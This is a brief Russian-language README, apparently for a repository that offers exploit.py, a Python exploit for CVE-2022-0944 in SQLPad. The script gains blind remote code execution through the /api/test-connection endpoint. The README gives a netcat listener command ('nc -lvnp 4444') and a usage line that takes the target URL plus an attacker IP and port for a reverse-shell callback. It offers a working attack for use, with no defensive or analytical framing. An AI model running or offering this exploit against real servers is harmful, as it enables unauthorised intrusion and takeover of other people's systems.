
Python-эксплойт для CVE-2022-0944, обеспечивающий слепое удалённое выполнение кода в SQLPad через конечную точку /api/test-connection с обратным вызовом через netcat.
Этот репозиторий содержит скрипт эксплуатации для CVE-2022-0944 в SQLPad — уязвимости, позволяющей удалённое выполнение кода (RCE) через конечную точку /api/test-connection.
Предоставленный скрипт (exploit.py) демонстрирует, как использовать уязвимость RCE в SQLPad. Скрипт отправляет полезную нагрузку на уязвимую конечную точку, выполняя команду на целевом сервере.
requests (можно установить через pip)nc -lvnp 4444
Запустите эксплуатацию
python exploit.py <sqlpad_url> <attacker_ip> <attacker_port>